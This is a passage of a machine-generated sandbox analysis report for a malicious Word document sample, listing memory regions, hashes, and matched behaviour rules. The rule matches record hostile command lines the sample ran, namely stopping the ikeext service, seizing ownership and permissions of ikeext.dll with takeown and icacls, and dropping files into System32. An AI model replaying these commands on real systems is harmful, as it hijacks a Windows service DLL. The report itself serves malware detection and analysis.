"timestamp": "00:00:53.428", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000026-region_00001531-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_319", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1531", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:53.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1532", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:53.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1533", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:53.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1534", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:53.443", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000026-region_00001535-addr_0x0000000000240000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_320", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1535", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:00:53.444", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000026-region_00001536-addr_0x0000000000370000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_321", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_1536", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:53.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1537", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:53.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1538", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:53.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1539", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:53.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1540", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:53.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1541", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:53.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1542", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:53.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1543", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:53.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1544", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:53.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1545", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:53.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3244031, "entry_point": 0, "filename": null, "id": "region_1546", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:00:53.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1547", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:53.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1548", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:53.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1549", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:53.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1550", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:53.454", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000026-region_00001551-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_322", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1551", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:53.454", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000026-region_00001552-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_323", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1552", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:53.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 0, "filename": null, "id": "region_1553", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:00:53.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 18350079, "entry_point": 0, "filename": null, "id": "region_1554", "name": "pagefile_0x0000000000580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5767168, "timestamp": "00:00:53.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 18350080, "type": "region", "version": 1 }, "end_va": 19804159, "entry_point": 0, "filename": null, "id": "region_1555", "name": "pagefile_0x0000000001180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18350080, "timestamp": "00:00:53.455", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [], "type": "remarks", "version": 1 }, "sample_details": { "filename": "exaai.doc", "id": 19550, "md5_hash": "292843976600e8ad2130224d70356bfc", "sample_type": "word_document", "sha1_hash": "31bad7ea8606e3e6d98692fa9f4b3f18ebb3c809", "sha256_hash": "d5c27308f50a9c6d8ccd01269ca09a7a13e1615945b8047c4e55c610718e317e", "size": 20457, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 258444, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_18453.png", "size": 258440, "thumbnail_archive_path": "screenshots/thumbnail_18453.png", "timestamp": "00:00:18.453", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_19460.png", "size": 257721, "thumbnail_archive_path": "screenshots/thumbnail_19460.png", "timestamp": "00:00:19.460", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_20472.png", "size": 237894, "thumbnail_archive_path": "screenshots/thumbnail_20472.png", "timestamp": "00:00:20.472", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_21472.png", "size": 272207, "thumbnail_archive_path": "screenshots/thumbnail_21472.png", "timestamp": "00:00:21.472", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_23473.png", "size": 74800, "thumbnail_archive_path": "screenshots/thumbnail_23473.png", "timestamp": "00:00:23.473", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_31536.png", "size": 80365, "thumbnail_archive_path": "screenshots/thumbnail_31536.png", "timestamp": "00:00:31.536", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_33840.png", "size": 79816, "thumbnail_archive_path": "screenshots/thumbnail_33840.png", "timestamp": "00:00:33.840", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_41188.png", "size": 77446, "thumbnail_archive_path": "screenshots/thumbnail_41188.png", "timestamp": "00:00:41.188", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_99999999.png", "size": 75754, "thumbnail_archive_path": "screenshots/thumbnail_99999999.png", "timestamp": "03:46:39.999", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-09-28 17:24", "analyzer_version": "2.2.0", "chrome_version": "58.0.3029.110", "firefox_version": "25.0", "flash_version": "10.3.183.90", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.600", "microsoft_excel_version": "15.0.4569.1504", "microsoft_office_version": "15.0.4569.1504", "microsoft_power_point_version": "15.0.4569.1504", "microsoft_project_version": "15.0.4569.1504", "microsoft_publisher_version": "15.0.4569.1504", "microsoft_visio_version": "15.0.4569.1504", "microsoft_word_version": "15.0.4569.1504", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_32-bit_pae", "vm_kernel_version": "6.1.7601.17514_(684da42a-30cc-450f-81c5-35b4d18944b1)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_65", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": [ { "ref_id": "gfn_1003", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 1, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_install_ipc_endpoint", "technique_desc": "Create mutex with name \"Global\\.net clr networking\".", "technique_path": "built_in._process._install_ipc_endpoint.vmray_install_ipc_endpoint", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1275", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Windows\\system32\\sensr9.dat", "hashes": [ { "md5_hash": "422a9797a40f1b1c3a72e9674adffedb", "sha1_hash": "92e351c5e1cc5abc36fb003b435acbc018253f56", "sha256_hash": "e002a93f45a9c9577b3f5edd5a018b2d0ad68783db483b77b23cf56016824fac", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\sensr9.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_1425", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"C:\\Windows\\system32\\sensr9.dat\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1428", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1487", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\net.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1520", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1579", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\takeown.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1590", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant system:F\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1649", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\icacls.exe\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_1660", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F\"\".", "technique_path": "built_in._process._document_create_process.vmray_document_create_process", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Windows\\system32\\ikeext32.dll", "hashes": [ { "md5_hash": "f95622f161474511b8d80d6b093aa610", "sha1_hash": "691848e306566c63f5dfe1edcca7c7e8882c4caa", "sha256_hash": "f2320e25eb9b4aa9a8366bd3aa23eabebe111a5610d3a62eba47d90427d5bc26", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\ikeext32.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\system32\\ikeext.dll", "hashes": [ { "md5_hash": "c3217cf9789f2b7a41f8ce54692d18fd", "sha1_hash": "f5bc9b2373201b214b3d0d248c95716023bc0c14", "sha256_hash": "f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\ikeext.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_1730", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"C:\\Windows\\system32\\ikeext32.dll\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Windows\\system32\\sensr3.dat", "hashes": [ { "md5_hash": "6317421e5b20c3df65bf66b4ec472187", "sha1_hash": "c6ed48d2daf396178b1840a1877532c429d85cd0", "sha256_hash": "2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\sensr3.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_1734", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"C:\\Windows\\system32\\sensr3.dat\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Windows\\system32\\ikeext.dll", "hashes": [ { "md5_hash": "c3217cf9789f2b7a41f8ce54692d18fd", "sha1_hash": "f5bc9b2373201b214b3d0d248c95716023bc0c14", "sha256_hash": "f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\ikeext.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_1737", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_create_file_in_os_dir", "technique_desc": "Create file \"C:\\Windows\\system32\\ikeext.dll\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_create_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Windows\\system32\\sensr3.dat", "hashes": [ { "md5_hash": "6317421e5b20c3df65bf66b4ec472187", "sha1_hash": "c6ed48d2daf396178b1840a1877532c429d85cd0", "sha256_hash": "2f64a87596e52aea3579fd696b472480e90c275d1cdef7e6ac44fea8ea8b4be1", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\sensr3.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_1741", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"C:\\Windows\\system32\\sensr3.dat\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Windows\\system32\\ikeext.dll", "hashes": [ { "md5_hash": "c3217cf9789f2b7a41f8ce54692d18fd", "sha1_hash": "f5bc9b2373201b214b3d0d248c95716023bc0c14", "sha256_hash": "f29d6f95c7ae0724bcd4aa64b41c4dc6c88479610dc14272af77376b4b5a26de", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\windows\\system32\\ikeext.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_os_dir", "operation_desc": "Modify operating system directory", "ref_gfncalls": [ { "ref_id": "gfn_1745", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_overwrite_file_in_os_dir", "technique_desc": "Modify file \"C:\\Windows\\system32\\ikeext.dll\" in the OS directory.", "technique_path": "built_in._file_system._modify_os_dir.vmray_overwrite_file_in_os_dir", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Windows\\system32\\sensr9.dat", "hashes": [ { "md5_hash": "422a9797a40f1b1c3a72e9674adffedb", "sha1_hash": "92e351c5e1cc5abc36fb003b435acbc018253f56", "sha256_hash": 